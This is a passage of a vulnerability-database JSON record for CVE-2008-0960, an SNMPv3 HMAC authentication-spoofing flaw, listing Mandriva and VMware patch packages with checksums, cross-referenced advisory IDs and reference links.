net-snmp-5.0.9-2.30E.24. perl Security update\n   \n   This fix upgrades the service console rpm for perl to version\n   perl-5.8.0-98.EL3. \n\n   ESX\n   ---\n   ESX 3.0.3 build 104629\n   ESX Server 3.0.3 CD image\n   md5sum: c2cda9242c6981c7eba1004e8fc5626d\n   Upgrade package from ESX Server 2.x to ESX Server 3.0.3\n   md5sum: 0ad8fa4707915139d8b2343afebeb92b\n   Upgrade package from earlier releases of ESX Server 3 to ESX Server\n3.0.3\n   md5sum: ff7f3dc12d34b474b231212bdf314113\n   release notes:\n   http://www.vmware.com/support/vi3/doc/releasenotes_esx303.html\n    \n5. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2292\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2007.1:\n 8db66ef5a5468d3fd72a47855230a28e  2007.1/i586/libnet-snmp10-5.3.1-3.2mdv2007.1.i586.rpm\n c951b17138ef11828b2ccf031d4cddaf  2007.1/i586/libnet-snmp10-devel-5.3.1-3.2mdv2007.1.i586.rpm\n 536a87919f32fac81964d0a907bf08fe  2007.1/i586/libnet-snmp10-static-devel-5.3.1-3.2mdv2007.1.i586.rpm\n 39e33947c21666dac5dbe5cfe103b26d  2007.1/i586/net-snmp-5.3.1-3.2mdv2007.1.i586.rpm\n 1eed5ebaff8f6f83befbf8d831900073  2007.1/i586/net-snmp-mibs-5.3.1-3.2mdv2007.1.i586.rpm\n 874db03c69584025e4d91049072d3c4e  2007.1/i586/net-snmp-trapd-5.3.1-3.2mdv2007.1.i586.rpm\n 11af93c879d8cd9353b7cb1826900222  2007.1/i586/net-snmp-utils-5.3.1-3.2mdv2007.1.i586.rpm\n 2c9e819eeb5fd472f6a0fe338d86182b  2007.1/i586/perl-NetSNMP-5.3.1-3.2mdv2007.1.i586.rpm \n 7a0806202ff8f3d838fa7958b636a449  2007.1/SRPMS/net-snmp-5.3.1-3.2mdv2007.1.src.rpm\n\n Mandriva Linux 2007.1/X86_64:\n aa27de502ce22110fd745c0b847b79d9  2007.1/x86_64/lib64net-snmp10-5.3.1-3.2mdv2007.1.x86_64.rpm\n 1843dd154c443cca9ae977e502221d6d  2007.1/x86_64/lib64net-snmp10-devel-5.3.1-3.2mdv2007.1.x86_64.rpm\n 838bd7820d446bd947bc46e090b38066  2007.1/x86_64/lib64net-snmp10-static-devel-5.3.1-3.2mdv2007.1.x86_64.rpm\n e659d3df04816330c7bf45008f66bc27  2007.1/x86_64/net-snmp-5.3.1-3.2mdv2007.1.x86_64.rpm\n 756d5606a1039d20a7512b0a109d53bb  2007.1/x86_64/net-snmp-mibs-5.3.1-3.2mdv2007.1.x86_64.rpm\n 8ad36943e07362865f3a48c99914e48c  2007.1/x86_64/net-snmp-trapd-5.3.1-3.2mdv2007.1.x86_64.rpm\n 483140c06017507127d12357c3ed2b41  2007.1/x86_64/net-snmp-utils-5.3.1-3.2mdv2007.1.x86_64.rpm\n e2bb901815ffa1ca5b0a16bc1363f84f  2007.1/x86_64/perl-NetSNMP-5.3.1-3.2mdv2007.1.x86_64.rpm \n 7a0806202ff8f3d838fa7958b636a449  2007.1/SRPMS/net-snmp-5.3.1-3.2mdv2007.1.src.rpm\n\n Mandriva Linux 2008.0:\n 8de3c4975620db2b2c2697d6f9deb79b  2008.0/i586/libnet-snmp15-5.4.1-1.1mdv2008.0.i586.rpm\n b1991c58d996f4be200fe141e28c5f7d  2008.0/i586/libnet-snmp-devel-5.4.1-1.1mdv2008.0.i586.rpm\n 03c54182cc7f97633f29ff0251a8c898  2008.0/i586/libnet-snmp-static-devel-5.4.1-1.1mdv2008.0.i586.rpm\n 1f792de19b7b38b56d68242958d5d800  2008.0/i586/net-snmp-5.4.1-1.1mdv2008.0.i586.rpm\n e3362a641e232a6ecf0b8230f0e49ec8  2008.0/i586/net-snmp-mibs-5.4.1-1.1mdv2008.0.i586.rpm\n bc6d8c10135ea64a4d512d80d04b1b39  2008.0/i586/net-snmp-trapd-5.4.1-1.1mdv2008.0.i586.rpm\n 8e7f28ee85fb48129eea57d11d391c8b  2008.0/i586/net-snmp-utils-5.4.1-1.1mdv2008.0.i586.rpm\n beab129e378f61a6bf62d366a4d90639  2008.0/i586/perl-NetSNMP-5.4.1-1.1mdv2008.0.i586.rpm \n 3fce488df784163f19e6a55061d773ca  2008.0/SRPMS/net-snmp-5.4.1-1.1mdv2008.0.src.rpm\n\n Mandriva Linux 2008.0/X86_64:\n 82b570c9cb7e0662df4d7da730c131db  2008.0/x86_64/lib64net-snmp15-5.4.1-1.1mdv2008.0.x86_64.rpm\n 20b8a6e3fc8dd82fe5ecfdb337553938  2008.0/x86_64/lib64net-snmp-devel-5.4.1-1.1mdv2008.0.x86_64.rpm\n 555688caa0eee850b3a5f835a5778849  2008.0/x86_64/lib64net-snmp-static-devel-5.4.1-1.1mdv2008.0.x86_64.rpm\n 60d65f80aec29dcb6d4ceb4bb117a9bc  2008.0/x86_64/net-snmp-5.4.1-1.1mdv2008.0.x86_64.rpm\n 685c9dd25b585afc128de1b3c092e5d5  2008.0/x86_64/net-snmp-mibs-5.4.1-1.1mdv2008.0.x86_64.rpm\n 7bff860904572c092f737ac17940d5b2  2008.0/x86_64/net-snmp-trapd-5.4.1-1.1mdv2008.0.x86_64.rpm\n e434686bddfb04f2a8bd01346517ecb4  2008.0/x86_64/net-snmp-utils-5.4.1-1.1mdv2008.0.x86_64.rpm\n 4fab6e498e1f05809db500ce895aad66  2008.0/x86_64/perl-NetSNMP-5.4.1-1.1mdv2008.0.x86_64.rpm \n 3fce488df784163f19e6a55061d773ca  2008.0/SRPMS/net-snmp-5.4.1-1.1mdv2008.0.src.rpm\n\n Mandriva Linux 2008.1:\n 4bafceae1a29f6557b5aa884eca24ba0  2008.1/i586/libnet-snmp15-5.4.1-5.1mdv2008.1.i586.rpm\n 1eedbae5df7e503de1cba736129beaa1  2008.1/i586/libnet-snmp-devel-5.4.1-5.1mdv2008.1.i586.rpm\n 615a88847cbf1ce6eaf0029037a14b1b  2008.1/i586/libnet-snmp-static-devel-5.4.1-5.1mdv2008.1.i586.rpm\n 7323cb7d35eb67664d40ad73b413679d  2008.1/i586/net-snmp-5.4.1-5.1mdv2008.1.i586.rpm\n d43ed96a806639a94af2a137c75e276e  2008.1/i586/net-snmp-mibs-5.4.1-5.1mdv2008.1.i586.rpm\n 7394b1361b43056b5eb99827771358cf  2008.1/i586/net-snmp-tkmib-5.4.1-5.1mdv2008.1.i586.rpm\n 8d6fd9308c2edbe8c020d2c33b3a841d  2008.1/i586/net-snmp-trapd-5.4.1-5.1mdv2008.1.i586.rpm\n dc58047a02e1a222af20aa794ea8f447  2008.1/i586/net-snmp-utils-5.4.1-5.1mdv2008.1.i586.rpm\n 2ad9888cd61fc4952c1cee0c48f714b5  2008.1/i586/perl-NetSNMP-5.4.1-5.1mdv2008.1.i586.rpm \n 7a19c1f8d42052af6392b18b48bd965c  2008.1/SRPMS/net-snmp-5.4.1-5.1mdv2008.1.src.rpm\n\n Mandriva Linux 2008.1/X86_64:\n 618c241e0ecb57685646264c9bb083b4  2008.1/x86_64/lib64net-snmp15-5.4.1-5.1mdv2008.1.x86_64.rpm\n bb0ebf49ee7cca29965aeb398f4725f6  2008.1/x86_64/lib64net-snmp-devel-5.4.1-5.1mdv2008.1.x86_64.rpm\n b4f29f00773291f6cc00784ed7cde470  2008.1/x86_64/lib64net-snmp-static-devel-5.4.1-5.1mdv2008.1.x86_64.rpm\n 3039811b6682dc4009b32ff48a99eb2b  2008.1/x86_64/net-snmp-5.4.1-5.1mdv2008.1.x86_64.rpm\n fab09178635501eb5d6a82eb7bd532a3  2008.1/x86_64/net-snmp-mibs-5.4.1-5.1mdv2008.1.x86_64.rpm\n da29d4c7edaa15d95f8bee98dbfab025  2008.1/x86_64/net-snmp-tkmib-5.4.1-5.1mdv2008.1.x86_64.rpm\n d9aad834d82d310c64f6f21e17a55920  2008.1/x86_64/net-snmp-trapd-5.4.1-5.1mdv2008.1.x86_64.rpm\n 7a7c871bd87dc91c16b046ac115cda70  2008.1/x86_64/net-snmp-utils-5.4.1-5.1mdv2008.1.x86_64.rpm\n d102ea2af0fcaaebd98defda72bcfc91  2008.1/x86_64/perl-NetSNMP-5.4.1-5.1mdv2008.1.x86_64.rpm \n 7a19c1f8d42052af6392b18b48bd965c  2008.1/SRPMS/net-snmp-5.4.1-5.1mdv2008.1.src.rpm\n\n Corporate 3.0:\n 335af3930865c8eb44ef436cad5fb373  corporate/3.0/i586/libnet-snmp5-5.1-7.4.C30mdk.i586.rpm\n b8e1d307ee6fa3905d292077fc063318  corporate/3.0/i586/libnet-snmp5-devel-5.1-7.4.C30mdk.i586.rpm\n a668cc4de411865567d1a93f34cee1e3  corporate/3.0/i586/libnet-snmp5-static-devel-5.1-7.4.C30mdk.i586.rpm\n d8c0d342b03e5719443d2de06c631bd5  corporate/3.0/i586/libsnmp0-4.2.3-8.2.C30mdk.i586.rpm\n 6bbe3bb2502ce3c974f7b5737331bb4d  corporate/3.0/i586/libsnmp0-devel-4.2.3-8.2.C30mdk.i586.rpm\n daca10f2e578f75c1e7415d78ed30265  corporate/3.0/i586/net-snmp-5.1-7.4.C30mdk.i586.rpm\n 1630ebd75201e1bc3956b12a26282f92  corporate/3.0/i586/net-snmp-mibs-5.1-7.4.C30mdk.i586.rpm\n 5a4f483c877a6278088a265cb3273d61  corporate/3.0/i586/net-snmp-trapd-5.1-7.4.C30mdk.i586.rpm\n 316d866de7fa7cd984d58f5cb742f5e3  corporate/3.0/i586/net-snmp-utils-5.1-7.4.C30mdk.i586.rpm\n e3d4197517565f12e2c3a8fd1cc5d2e7  corporate/3.0/i586/ucd-snmp-4.2.3-8.2.C30mdk.i586.rpm\n 17e8d856fd1dac18552818a842105c88  corporate/3.0/i586/ucd-snmp-utils-4.2.3-8.2.C30mdk.i586.rpm \n ccaa4d311ad0e5d119e17b1f1876c7e2  corporate/3.0/SRPMS/net-snmp-5.1-7.4.C30mdk.src.rpm\n 53e16d2069cffb7e7d1e7a324192d5c2  corporate/3.0/SRPMS/ucd-snmp-4.2.3-8.2.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n b31f277942fca76d953007c94a60cae2  corporate/3.0/x86_64/lib64net-snmp5-5.1-7.4.C30mdk.x86_64.rpm\n e4a3fba10ccdd805dc8783ae68c99a42  corporate/3.0/x86_64/lib64net-snmp5-devel-5.1-7.4.C30mdk.x86_64.rpm\n 530a94cc87af0e4d6e9f3815473c0dd4  corporate/3.0/x86_64/lib64net-snmp5-static-devel-5.1-7.4.C30mdk.x86_64.rpm\n f246ca421b5d16c599d53f70e4b97660  corporate/3.0/x86_64/lib64snmp0-4.2.3-8.2.C30mdk.x86_64.rpm\n b943e07726a2fecb016ef4ba626906d8  corporate/3.0/x86_64/lib64snmp0-devel-4.2.3-8.2.C30mdk.x86_64.rpm\n 22822876f72e35cf6d1ed027df93e74a  corporate/3.0/x86_64/net-snmp-5.1-7.4.C30mdk.x86_64.rpm\n e7e51782b9bbd1e1bdf93c17fb953280  corporate/3.0/x86_64/net-snmp-mibs-5.1-7.4.C30mdk.x86_64.rpm\n e67a9105f9492c020693d48ce55652ea  corporate/3.0/x86_64/net-snmp-trapd-5.1-7.4.C30mdk.x86_64.rpm\n 171a17e507b2dfdb9c70c0089e582221  corporate/3.0/x86_64/net-snmp-utils-5.1-7.4.C30mdk.x86_64.rpm\n 96886146d21175b076e92d59e96f5016  corporate/3.0/x86_64/ucd-snmp-4.2.3-8.2.C30mdk.x86_64.rpm\n 1b6ee4c253f15be516a1928a4f791f15  corporate/3.0/x86_64/ucd-snmp-utils-4.2.3-8.2.C30mdk.x86_64.rpm \n ccaa4d311ad0e5d119e17b1f1876c7e2  corporate/3.0/SRPMS/net-snmp-5.1-7.4.C30mdk.src.rpm\n 53e16d2069cffb7e7d1e7a324192d5c2  corporate/3.0/SRPMS/ucd-snmp-4.2.3-8.2.C30mdk.src.rpm\n\n Corporate 4.0:\n 6cbe9d76db3b05c2435bcbc5cf16c898  corporate/4.0/i586/libnet-snmp5-5.2.1.2-5.2.20060mlcs4.i586.rpm\n 586a55cfde45020d5ea0ebf5f2d6c840  corporate/4.0/i586/libnet-snmp5-devel-5.2.1.2-5.2.20060mlcs4.i586.rpm\n d992d8300cf0639942a179349d592e15  corporate/4.0/i586/libnet-snmp5-static-devel-5.2.1.2-5.2.20060mlcs4.i586.rpm\n 03a49b848c376b705dcfcef0ec817daf  corporate/4.0/i586/net-snmp-5.2.1.2-5.2.20060mlcs4.i586.rpm\n 22b9d01b3b7a8a34ed3e1a5a435286a8  corporate/4.0/i586/net-snmp-mibs-5.2.1.2-5.2.20060mlcs4.i586.rpm\n dccc01a94c1f29eac2875e6a935bf589  corporate/4.0/i586/net-snmp-trapd-5.2.1.2-5.2.20060mlcs4.i586.rpm\n 77f93230f96abce039b52ca5612eaa36  corporate/4.0/i586/net-snmp-utils-5.2.1.2-5.2.20060mlcs4.i586.rpm\n 8a7209b70979c9d73035ff40cbd8dbb4  corporate/4.0/i586/perl-NetSNMP-5.2.1.2-5.2.20060mlcs4.i586.rpm \n ac919459a8752cddfd441c085ca69117  corporate/4.0/SRPMS/net-snmp-5.2.1.2-5.2.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n f94c7e967973ba8aa12b5605251d6e78  corporate/4.0/x86_64/lib64net-snmp5-5.2.1.2-5.2.20060mlcs4.x86_64.rpm\n f332985986eff2d6c8a75b5c263dedb1  corporate/4.0/x86_64/lib64net-snmp5-devel-5.2.1.2-5.2.20060mlcs4.x86_64.rpm\n 82fc454916e75866370ee738292021c8  corporate/4.0/x86_64/lib64net-snmp5-static-devel-5.2.1.2-5.2.20060mlcs4.x86_64.rpm\n ff0adeb23df57eb34869c7100df159da  corporate/4.0/x86_64/net-snmp-5.2.1.2-5.2.20060mlcs4.x86_64.rpm\n 72f2dc9cb1695999660a9ff9c97e4c47  corporate/4.0/x86_64/net-snmp-mibs-5.2.1.2-5.2.20060mlcs4.x86_64.rpm\n 0f244551c87e051a8274e5050cf0bc2a  corporate/4.0/x86_64/net-snmp-trapd-5.2.1.2-5.2.20060mlcs4.x86_64.rpm\n 7c4e7fb304c77c6551a50495d338e84e  corporate/4.0/x86_64/net-snmp-utils-5.2.1.2-5.2.20060mlcs4.x86_64.rpm\n 68d81ca4c173710ef43b36092df2a6ee  corporate/4.0/x86_64/perl-NetSNMP-5.2.1.2-5.2.20060mlcs4.x86_64.rpm \n ac919459a8752cddfd441c085ca69117  corporate/4.0/SRPMS/net-snmp-5.2.1.2-5.2.20060mlcs4.src.rpm\n\n Multi Network Firewall 2.0:\n f98286a301d580fe306917cf0169ef88  mnf/2.0/i586/libnet-snmp5-5.1-7.4.M20mdk.i586.rpm \n 3ba27516773b1dd933828207cecc7754  mnf/2.0/SRPMS/net-snmp-5.1-7.4.M20mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2008-0960"
          },
          {
            "db": "CERT/CC",
            "id": "VU#878044"
          },
          {
            "db": "BID",
            "id": "29623"
          },
          {
            "db": "VULHUB",
            "id": "VHN-31085"
          },
          {
            "db": "PACKETSTORM",
            "id": "71406"
          },
          {
            "db": "PACKETSTORM",
            "id": "67140"
          },
          {
            "db": "PACKETSTORM",
            "id": "71748"
          },
          {
            "db": "PACKETSTORM",
            "id": "68741"
          },
          {
            "db": "PACKETSTORM",
            "id": "72606"
          },
          {
            "db": "PACKETSTORM",
            "id": "69029"
          },
          {
            "db": "PACKETSTORM",
            "id": "67532"
          }
        ],
        "trust": 2.61
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-31085",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-31085"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "OCERT",
            "id": "OCERT-2008-006",
            "trust": 2.9
          },
          {
            "db": "CERT/CC",
            "id": "VU#878044",
            "trust": 2.9
          },
          {
            "db": "NVD",
            "id": "CVE-2008-0960",
            "trust": 2.7
          },
          {
            "db": "BID",
            "id": "29623",
            "trust": 2.0
          },
          {
            "db": "SECUNIA",
            "id": "30574",
            "trust": 1.9
          },
          {
            "db": "SECUNIA",
            "id": "30665",
            "trust": 1.9
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2971",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-1788",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-1787",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-1836",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-1800",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-1612",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-1797",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-1801",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-1981",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2008-2361",
            "trust": 1.7
          },
          {
            "db": "EXPLOIT-DB",
            "id": "5790",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "32664",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "35463",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "33003",
            "trust": 1.7
          },
          {
            "db": "SREASON",
            "id": "3933",
            "trust": 1.7
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2008/06/09/1",
            "trust": 1.7
          },
          {
            "db": "SECTRACK",
            "id": "1020218",
            "trust": 1.7
          },
          {
            "db": "USCERT",
            "id": "TA08-162A",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "30802",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30626",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31334",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30612",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30615",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31568",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31351",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30648",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "31467",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30647",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30596",
            "trust": 1.1
          },
          {
            "db": "BUGTRAQ",
            "id": "20081031 VMSA-2008-0017 UPDATED ESX PACKAGES FOR LIBXML2, UCD-SNMP, LIBTIFF",
            "trust": 0.6
          },
          {
            "db": "BUGTRAQ",
            "id": "20080609 [OCERT-2008-006] MULTIPLE SNMP IMPLEMENTATIONS HMAC AUTHENTICATION SPOOFING",
            "trust": 0.6
          },
          {
            "db": "REDHAT",
            "id": "RHSA-2008:0529",
            "trust": 0.6
          },
          {
            "db": "MANDRIVA",
            "id": "MDVSA-2008:118",
            "trust": 0.6
          },
          {
            "db": "MILW0RM",
            "id": "5790",
            "trust": 0.6
          },
          {
            "db": "FEDORA",
            "id": "FEDORA-2008-5218",
            "trust": 0.6
          },
          {
            "db": "FEDORA",
            "id": "FEDORA-2008-5215",
            "trust": 0.6
          },
          {
            "db": "FEDORA",
            "id": "FEDORA-2008-5224",
            "trust": 0.6
          },
          {
            "db": "SUNALERT",
            "id": "238865",
            "trust": 0.6
          },
          {
            "db": "MLIST",
            "id": "[OSS-SECURITY] 20080609 [OCERT-2008-006] MULTIPLE SNMP IMPLEMENTATIONS HMAC AUTHENTICATION SPOOFING",
            "trust": 0.6
          },
          {
            "db": "CERT/CC",
            "id": "TA08-162A",
            "trust": 0.6
          },
          {
            "db": "UBUNTU",
            "id": "USN-685-1",
            "trust": 0.6
          },
          {
            "db": "DEBIAN",
            "id": "DSA-1663",
            "trust": 0.6
          },
          {
            "db": "CISCO",
            "id": "20080610 SNMP VERSION 3 AUTHENTICATION VULNERABILITIES",
            "trust": 0.6
          },
          {
            "db": "GENTOO",
            "id": "GLSA-200808-02",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200806-140",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "67532",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "68741",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "72606",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "67140",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "71748",
            "trust": 0.2
          },
          {
            "db": "PACKETSTORM",
            "id": "67160",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "68866",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "67231",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-31085",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "71406",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "69029",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#878044"
          },
          {
            "db": "VULHUB",
            "id": "VHN-31085"
          },
          {
            "db": "BID",
            "id": "29623"
          },
          {
            "db": "PACKETSTORM",
            "id": "71406"
          },
          {
            "db": "PACKETSTORM",
            "id": "67140"
          },
          {
            "db": "PACKETSTORM",
            "id": "71748"
          },
          {
            "db": "PACKETSTORM",
            "id": "68741"
          },
          {
            "db": "PACKETSTORM",
            "id": "72606"
          },
          {
            "db": "PACKETSTORM",
            "id": "69029"
          },
          {
            "db": "PACKETSTORM",
            "id": "67532"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200806-140"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-0960"
          }
        ]
      },
      "id": "VAR-200806-0575",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-31085"
          }
        ],
        "trust": 0.61355825
      },
      "last_update_date": "2026-04-10T21:42:31.704000Z",
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-31085"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-0960"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.9,
            "url": "http://www.ocert.org/advisories/ocert-2008-006.html"
          },
          {
            "trust": 2.6,
            "url": "http://sourceforge.net/forum/forum.php?forum_id=833770"
          },
          {
            "trust": 2.1,
            "url": "http://www.kb.cert.org/vuls/id/878044"
          },
          {
            "trust": 2.0,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20080610-snmpv3.shtml"
          },
          {
            "trust": 2.0,
            "url": "http://support.apple.com/kb/ht2163"
          },
          {
            "trust": 2.0,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2008-282.htm"
          },
          {
            "trust": 2.0,
            "url": "http://www.kb.cert.org/vuls/id/mimg-7ets5z"
          },
          {
            "trust": 2.0,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=447974"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/29623"
          },
          {
            "trust": 1.7,
            "url": "http://www.us-cert.gov/cas/techalerts/ta08-162a.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.kb.cert.org/vuls/id/ctar-7fbs8q"
          },
          {
            "trust": 1.7,
            "url": "http://www.kb.cert.org/vuls/id/mimg-7ets87"
          },
          {
            "trust": 1.7,
            "url": "http://www.vmware.com/security/advisories/vmsa-2008-0013.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.debian.org/security/2008/dsa-1663"
          },
          {
            "trust": 1.7,
            "url": "https://www.redhat.com/archives/fedora-package-announce/2008-june/msg00363.html"
          },
          {
            "trust": 1.7,
            "url": "https://www.redhat.com/archives/fedora-package-announce/2008-june/msg00459.html"
          },
          {
            "trust": 1.7,
            "url": "https://www.redhat.com/archives/fedora-package-announce/2008-june/msg00380.html"
          },
          {
            "trust": 1.7,
            "url": "http://security.gentoo.org/glsa/glsa-200808-02.xml"
          },
          {
            "trust": 1.7,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2008:118"
          },
          {
            "trust": 1.7,
            "url": "http://www.vmware.com/security/advisories/vmsa-2008-0017.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.openwall.com/lists/oss-security/2008/06/09/1"
          },
          {
            "trust": 1.7,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0529.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.securitytracker.com/id?1020218"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/32664"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/33003"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/35463"
          },
          {
            "trust": 1.7,
            "url": "http://securityreason.com/securityalert/3933"
          },
          {
            "trust": 1.7,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-238865-1"
          },
          {
            "trust": 1.7,
            "url": "http://www.ubuntu.com/usn/usn-685-1"
          },
          {
            "trust": 1.7,
            "url": "http://www.vupen.com/english/advisories/2009/1612"
          },
          {
            "trust": 1.7,
            "url": "http://sourceforge.net/tracker/index.php?func=detail\u0026aid=1989089\u0026group_id=12694\u0026atid=456380"
          },
          {
            "trust": 1.4,
            "url": "http://lists.ingate.com/pipermail/productinfo/2008/000021.html"
          },
          {
            "trust": 1.4,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0528.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce/2008//jun/msg00002.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/493218/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/497962/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "https://www.exploit-db.com/exploits/5790"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10820"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a5785"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a6414"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30574"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30596"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30612"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30615"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30626"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30647"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30648"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30665"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30802"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31334"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31351"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31467"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31568"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2008-08/msg00000.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/1787/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/1788/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/1797/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/1800/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/1801/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/1836/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/1981/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2361"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2971"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=127730470825399\u0026w=2"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/30574/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/30665/"
          },
          {
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-238865-1 "
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0960"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/archive/1/497962/100/0/threaded"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/archive/1/493218/100/0/threaded"
          },
          {
            "trust": 0.6,
            "url": "http://www.milw0rm.com/exploits/5790"
          },
          {
            "trust": 0.6,
